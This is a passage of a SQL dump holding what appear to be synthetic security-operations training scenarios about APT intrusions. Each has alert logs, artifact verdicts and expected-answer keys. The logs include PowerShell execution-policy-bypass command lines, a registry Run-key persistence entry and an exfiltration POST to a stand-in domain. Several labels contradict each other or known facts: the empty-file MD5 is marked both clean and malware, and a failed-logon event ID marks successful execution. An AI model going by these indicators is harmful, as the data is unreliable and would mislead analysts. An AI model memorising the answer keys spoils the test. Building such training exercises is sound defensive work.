activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified in attack\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with CCleaner supply chain attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"CCleaner_v5.33.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious file used in supply chain attack\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (536, 'Command and Control: Maintaining Communication', 'high', 'Network Traffic Analysis', 'Network traffic analysis has identified persistent communication between internal hosts and known APT41 command and control servers. The backdoors on compromised systems maintain communication to ensure ongoing control. Indicators such as IPs, hashes, and domains have been flagged.', 'C2 Communication', 'T1105', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:21:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"filename\":\"backdoor.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"control.apt41-malicious.com\",\"username\":\"jdoe\",\"malware_family\":\"APT41_Backdoor\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash of the backdoor file used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"control.apt41-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Malicious domain used for C2 communication by APT41.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with APT41 backdoor.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Username of the compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (537, 'Cleanup: Covering Tracks', 'high', 'File Integrity Monitoring', 'APT41 has been detected employing anti-forensic techniques to erase traces of their attack. This includes the deletion of log files and alteration of timestamps to cover their tracks, complicating detection and analysis efforts.', 'Anti-Forensic Techniques', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:14:23Z\",\"event_type\":\"file_modification\",\"user\":\"malicious_actor\",\"affected_files\":[\"/var/log/auth.log\",\"/var/log/syslog\"],\"modification_type\":\"delete\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"hashes\":[\"e99a18c428cb38d5f260853678922e03\",\"d41d8cd98f00b204e9800998ecf8427e\"],\"associated_username\":\"admin_user\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in the incident.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"Empty file hash indicating possible log file deletion.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected from admin account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (538, 'Suspicious Cloud Service Access', 'medium', 'Firewall logs', 'A compromised email account was used to send phishing emails containing links to payloads hosted on OneDrive. This appears to be an attempt to gain initial access to the network.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T10:15:30Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"src_port\":443,\"dst_port\":58642,\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"username\":\"compromised_user@domain.com\",\"url\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"filename\":\"Invoice_Details.docx\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"email_subject\":\"Urgent: Invoice Details Required\"}', '2026-01-07 22:29:04', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis\",\"verdict\":\"suspicious\",\"details\":\"URL used in phishing email to deliver malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Details.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware delivery.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user@domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Account Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Account activity consistent with compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (539, 'Cloud Atlas Malware Execution', 'high', 'Endpoint detection and response (EDR) logs', 'Upon successful initial access, the Cloud Atlas malware is executed on the target systems, utilizing PowerShell scripts to maintain stealth and execute remote commands.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\deployUpdate.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"deployUpdate.ps1\",\"event_description\":\"PowerShell script executed for potential remote command execution\",\"os_version\":\"Windows 10 Pro\",\"device_name\":\"DESKTOP-AB123CD\"}', '2026-01-07 22:29:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a company asset\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with Cloud Atlas\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"deployUpdate.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Inventory\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file not commonly used in environment\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Active employee with system access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (540, 'Encrypted Data Exfiltration via Cloud Storage', 'high', 'Network traffic analysis', 'Network traffic analysis has identified suspicious encrypted data transfers from an internal system to a cloud storage service. The data is believed to be encrypted diplomatic communications exfiltrated to a Google Drive account, potentially for malicious purposes.', 'Exfiltration', 'T1567.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"35.190.247.1\",\"src_port\":443,\"dst_port\":443,\"protocol\":\"HTTPS\",\"user\":\"j.doe@diplomacy.gov\",\"filename\":\"encrypted_comm_20231015.bin\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"cloud_service\":\"Google Drive\",\"action\":\"upload\",\"bytes_sent\":1048576,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\"}', '2026-01-07 22:29:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to be compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"35.190.247.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Google Cloud\",\"verdict\":\"suspicious\",\"details\":\"Google Drive IP used for potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with encrypted payload used in exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_comm_20231015.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File suspected to contain sensitive encrypted communications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (541, 'Unauthorized Access Detected', 'high', 'Email Gateway Logs', 'Rocra initiates its attack by sending spear-phishing emails containing malicious attachments to gain initial foothold in the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"c2c9d5a3-5b4f-4099-a6e5-124ae6d2b5f7\",\"from\":\"attacker@example.malicious\",\"to\":\"user@targetcompany.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_Update_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"malware_family\":\"Rocra\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.malicious\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Rocra.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Rocra command and control servers.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Update_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern commonly used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (542, 'Execution of Malicious Payload', 'high', 'Endpoint Security Alerts', 'Once access is achieved, the Rocra malware executes its payload, allowing attackers to remotely control infected machines. This step indicates the execution phase of the attack with potential remote control capabilities.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"john.doe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_name\":\"Rocra_Payload.exe\",\"action\":\"Execution\",\"status\":\"Success\",\"severity\":\"High\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Rocra APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Rocra_Payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Filename detected during execution of Rocra malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"clean\",\"details\":\"Legitimate internal user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (543, 'Establishing Backdoor for Persistence', 'high', 'Network Traffic Analysis', 'Rocra sets up a backdoor on the compromised systems, enabling persistent access even after reboots or network changes. Network traffic indicates communication with a known malicious IP and the transfer of a backdoor executable.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"destination_port\":80,\"event_type\":\"network\",\"file\":{\"name\":\"backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user\":\"compromised_user\",\"action\":\"file_download\",\"status\":\"success\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocra APT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Rocra backdoor executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File name associated with malicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (544, 'Stealthy Lateral Movement', 'high', 'Active Directory Logs', 'Rocra uses stolen credentials to move laterally within the network, searching for sensitive diplomatic and research data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"logon_type\":3,\"target_username\":\"jdoe\",\"target_domain\":\"CORP\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.10.3.15\",\"authentication_package\":\"Kerberos\",\"logon_process\":\"NtLmSsp\",\"subject_user_name\":\"admin_elevated\",\"subject_domain_name\":\"CORP\",\"subject_logon_id\":\"0x3E7\",\"hashes\":[\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\"],\"event_description\":\"An account was successfully logged on.\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scanning\",\"verdict\":\"internal\",\"details\":\"Internal IP used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"network_logs\",\"verdict\":\"internal\",\"details\":\"Destination IP for the lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Stolen credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Potentially associated with known APT activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (545, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Alerts', 'The final stage sees Rocra exfiltrating targeted data, including encrypted and previously deleted files, marking the success of their espionage mission.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:32:00Z\",\"event\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"encrypted_project_files.zip\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"exfil_method\":\"HTTP POST\",\"destination_url\":\"http://malicious-domain.com/upload\",\"associated_user\":\"jdoe@company.com\",\"alert_id\":\"DLP-2023-5678\",\"indicator_of_compromise\":[\"IP:203.0.113.45\",\"HASH:b1946ac92492d2347c6235b4d2611184\",\"URL:http://malicious-domain.com/upload\"]}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malware samples.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration in previous incidents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (546, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email containing a malicious attachment was detected targeting key personnel within the organization. The email originated from a known malicious IP address and contained a file with a suspicious hash linked to advanced persistent threat (APT) activities.', 'Initial Access', 'T1566.001', 1, 'new', 34, '{\"timestamp\":\"2023-10-15T08:42:00Z\",\"email_subject\":\"Urgent: Review the Attached Document\",\"source_ip\":\"203.0.113.45\",\"destination_email\":\"j.doe@organization.com\",\"attachment_name\":\"Invoice_October2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_email\":\"finance@truste-partners.com\",\"recipient_ip\":\"192.168.1.15\"}', '2026-01-07 22:33:18', '2026-01-11 01:38:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to document-based malware used in spear-phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"finance@truste-partners.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address not recognized and associated with recent phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (547, 'Unauthorized Code Execution Detected', 'critical', 'Endpoint Detection and Response (EDR) System', 'Upon opening the attachment, a sophisticated malware payload is executed, initiating the deployment of espionage modules.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:15Z\",\"event_id\":\"4625\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"victim-machine.local\",\"user\":{\"domain\":\"victim-domain\",\"name\":\"john.doe\",\"full_name\":\"John Doe\"},\"process\":{\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443},\"file\":{\"name\":\"malicious_script.ps1\",\"path\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT groups.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution detected.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User employed within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (548, 'Malware Persistence Mechanism Activated', 'high', 'System Registry Logs', 'The malware establishes persistence by modifying registry entries, allowing it to survive system reboots and maintain a foothold within the network. The registry key associated with the malware was altered to execute the malicious binary during startup.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"event_id\":\"4624\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"compromised-host.local\",\"user\":\"john.doe\",\"registry_change\":{\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"MaliciousStartup\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\evil.exe\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\"}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', 